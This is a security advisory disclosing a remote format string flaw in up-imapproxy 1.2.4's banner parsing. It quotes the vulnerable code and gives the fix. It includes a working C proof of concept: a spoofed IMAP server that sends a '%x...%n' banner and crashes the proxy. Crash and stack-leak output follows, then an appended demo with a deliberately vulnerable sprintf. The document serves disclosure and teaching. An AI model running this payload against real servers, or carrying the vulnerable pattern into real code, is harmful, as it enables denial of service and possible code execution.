[.:: ExploiterZ Labs aka Unl0ck Research Team ::.]

Advisory
  target:  Imapproxy
  version: 1.2.4 and earlier
  type:    format string
  remote:  yes
  vendor:  http://imapproxy.org
  patch:   does not exist

[.: Details :.]

A format string vulnerability was found in the latest version of the IMAP proxy server (up-imapproxy).

The vulnerability is in:

  /up-imapproxy-1.2.4/src/main.c
  function: ParseBannerAndCapability()

  static int ParseBannerAndCapability( char *DestBuf,
                                       unsigned int DestBufSize,
                                       char *SourceBuf,
                                       unsigned int SourceBufSize )
  {
      ...
      SourceBuf[SourceBufSize - 2] = '\0';
      CP = strtok( SourceBuf, " " );
      ...
      sprintf( DestBuf, CP );
      ...
  }

This function is called from another function in main.c:

  function: SetBannerAndCapability()

  static void SetBannerAndCapability( void )
  {
      ...
      BannerLen = ParseBannerAndCapability( Banner, sizeof Banner - 1,
                                            itd.ReadBuf, BytesRead );
      ...
      if ( strncasecmp( Banner, IMAP_UNTAGGED_OK, strlen(IMAP_UNTAGGED_OK)) )
      {
          syslog(LOG_ERR, "%s: Unexpected response from imap server on initial connection: %s -- Exiting.", fn, Banner);
          close( itd.conn->sd );
          exit( 1 );
      }
      ...
  }

As you can see, ParseBannerAndCapability() calls sprintf() with the server-supplied token as the format string instead of a fixed one. The correct call is:

  sprintf( DestBuf, "%s", CP );

instead of:

  sprintf( DestBuf, CP );

The data reaches sprintf() because imapproxy does not sanitise the banner it reads from the IMAP daemon on the initial connection, so a malicious or spoofed upstream IMAP server can use the vulnerability to execute arbitrary code on the machine running imapproxy. The PoC below demonstrates the crash.

[.: PoC :.]

  /*
   * PoC exploit code for up-imapproxy <= 1.2.4
   * by Darkeagle from ExploiterZ Labs
   * eagle [ at ] exploiterz [ dot ] org
   *
   * The exploit binds port 143 and plays the IMAP server; when imapproxy
   * connects to it and reads the banner, the imapproxy child process
   * crashes.
   */
  #include <stdio.h>
  #include <string.h>
  #include <unistd.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  #include <arpa/inet.h>

  /* the "banner" is the format string imapproxy hands to sprintf() */
  #define BANNER "AAAAAAAAAA%x%x%x%x%x%n%n%n\r\n\r\n"

  int main ( int argc, char *argv[] )
  {
      struct sockaddr_in addr, cl_addr;
      int sock, cl_sock;
      char *Iaddr;
      socklen_t l;

      (void)argc; (void)argv;
      printf("Imapproxy <= 1.2.4 PoC Exploit\n");

      sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      if ( sock < 0 ) { perror("socket"); return 1; }

      memset(&addr, 0, sizeof(addr));
      addr.sin_family = AF_INET;
      addr.sin_port = htons(143);               /* IMAP port: binding needs root */
      addr.sin_addr.s_addr = inet_addr("127.0.0.1");

      if ( bind(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0 ) { perror("bind"); return 1; }
      listen(sock, 5);

      while (1) {
          l = sizeof(cl_addr);                  /* must be set before accept() */
          cl_sock = accept(sock, (struct sockaddr*)&cl_addr, &l);
          if ( cl_sock < 0 ) { perror("accept"); continue; }
          Iaddr = inet_ntoa(cl_addr.sin_addr);
          send(cl_sock, BANNER, strlen(BANNER), 0);
          printf("IP: %s\n", Iaddr);
          close(cl_sock);
      }
      return 0;
  }

[.: Screenshot :.]

.. Child process crashed ..

  Program received signal SIGSEGV, Segmentation fault.
  [Switching to Thread 1076593408 (LWP 8279)]
  0x401b5904 in vfprintf () from /lib/tls/libc.so.6
  (gdb) ...

.. Syslog details ..

  [root@localhost bin]# tail -10 /var/log/syslog
  ....
  Oct 28 14:12:55 localhost in.imapproxyd[9201]: SetBannerAndCapability(): Unexpected response from imap server on initial connection: AAAAAAAAAbfffc4ccbfffc4ccbfffc4b45bfffd4e8804afb98056E60^M -- Exiting.
  [root@localhost bin]#

The stack values printed into the syslog line (bfffc4cc, ...) are the %x conversions reading the caller's stack, which confirms that the banner is being interpreted as a format string.

[.: Credits :.]

Goes to Darkeagle [ eagle { at } exploiterz { dot } org ]
http://exploiterz.org || http://55k7.org
(c) 2004-2005 Unl0ck Research Team
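The following is an added, self-contained example and is not code from the advisory or from up-imapproxy. It puts a stand-in for the vulnerable sprintf( DestBuf, CP ) pattern next to the corrected form so the difference can be observed without undefined behaviour: the constructed banner uses only "%%" sequences, which the vulnerable version collapses to "%" (proof that the banner is parsed as a format string) while the fixed version copies them verbatim. The helper first_token() and the BANNER_MAX size are assumptions; the tokenisation that the advisory elides with "..." is not reproduced. The fixed form also bounds the copy with snprintf() using the dest_size parameter, a hardening beyond the advisory's suggested "%s" fix.

```c
#include <stdio.h>
#include <string.h>

#define BANNER_MAX 512   /* assumed working-buffer size, not from the project */

/* Copy the banner, cut the trailing CRLF (the advisory's snippet does this
 * with SourceBuf[SourceBufSize - 2] = '\0') and return the first
 * space-separated token, as strtok( SourceBuf, " " ) does. */
static char *first_token(char *copy, size_t copy_size, const char *banner)
{
    strncpy(copy, banner, copy_size - 1);
    copy[copy_size - 1] = '\0';
    copy[strcspn(copy, "\r\n")] = '\0';
    return strtok(copy, " ");
}

/* Vulnerable form: the server-supplied token is the format string.
 * The pragma silences -Wformat-security, the warning that flags exactly
 * this pattern; it is kept here only so the bug compiles for demonstration. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int parse_banner_vuln(char *dest, size_t dest_size, const char *banner)
{
    char copy[BANNER_MAX];
    char *tok = first_token(copy, sizeof copy, banner);

    (void)dest_size;               /* the vulnerable call never uses it */
    if (tok == NULL)
        return -1;
    return sprintf(dest, tok);     /* BUG: attacker controls the format */
}
#pragma GCC diagnostic pop

/* Fixed form: a literal "%s" format, and the copy is bounded by dest_size.
 * Returns the number of bytes stored in dest (truncated if it did not fit). */
int parse_banner_fixed(char *dest, size_t dest_size, const char *banner)
{
    char copy[BANNER_MAX];
    char *tok = first_token(copy, sizeof copy, banner);

    if (tok == NULL || dest_size == 0)
        return -1;
    snprintf(dest, dest_size, "%s", tok);
    return (int)strlen(dest);
}

int main(void)
{
    /* Constructed sample banner: "%%" is the only conversion that is safe
     * to feed to the vulnerable call; "%x"/"%n" as in the PoC would be
     * undefined behaviour here. */
    const char *banner = "AAAA%%%%BBBB\r\n";
    char out[64];

    parse_banner_vuln(out, sizeof out, banner);
    printf("vulnerable: %s\n", out);   /* AAAA%%BBBB  (format was interpreted) */

    parse_banner_fixed(out, sizeof out, banner);
    printf("fixed:      %s\n", out);   /* AAAA%%%%BBBB (copied verbatim) */
    return 0;
}
```

Compile with -Wformat-security (or -Wformat=2) and the vulnerable function is reported at build time; that single compiler flag would have caught the bug in main.c before it shipped.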